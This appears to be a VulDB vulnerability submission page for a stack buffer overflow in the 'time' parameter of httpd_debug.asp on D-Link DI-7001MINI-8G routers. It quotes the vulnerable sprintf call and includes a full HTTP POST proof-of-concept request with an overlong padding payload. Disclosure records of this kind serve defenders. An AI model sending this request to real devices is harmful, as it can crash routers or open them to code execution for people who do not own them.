提交 #825198: D-Link DI-7001MINI-8G <=19.09.19A1 Buffer Overflow信息

标题	D-Link DI-7001MINI-8G <=19.09.19A1 Buffer Overflow
描述	A critical stack-based buffer overflow vulnerability has been identified in D-Link DI-7001MINI-8G devices. The flaw exists in the handling of HTTP POST requests to the httpd_debug.asp endpoint. Specifically, the time parameter is user-controllable and is directly passed to the sprintf function without proper length validation, as demonstrated in the vulnerable code snippet: sprintf(_ret:0_msg:_ok__, "echo \"httpd_debug time %s\" >/dev/console", parm);. By sending a specially crafted, overly long value for this parameter, a remote attacker can overflow the fixed-size buffer. Successful exploitation may lead to a denial of service (DoS) or, under certain circumstances, potential arbitrary code execution. POC: POST /httpd_debug.asp HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:143.0) Gecko/20100101 Firefox/143.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: wysLanguage=CN; userid=admin; gw_userid=admin,gw_passwd=E3A7F1B4C8D2E5F7A0B3C6D9E1F4A7B2 Upgrade-Insecure-Requests: 1 Priority: u=0, i Content-Type: application/x-www-form-urlencoded Content-Length: 276 time=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
来源	⚠️ https://github.com/666324/dlink-DI-7001MINI-8G-vuln
用户	Zheng (UID 97999)
提交	2026-05-11 04時02分 (24 日前)
管理	2026-05-31 16時13分 (21 days later)
状态	已接受
VulDB条目	367549 [D-Link DI-7001 MINI 直到 19.09.19A1 API /httpd_debug.asp sprintf 时间内存损坏]
积分	20

◂ 上一步一览下一步 ▸

Do you know our Splunk app?

Download it now for free!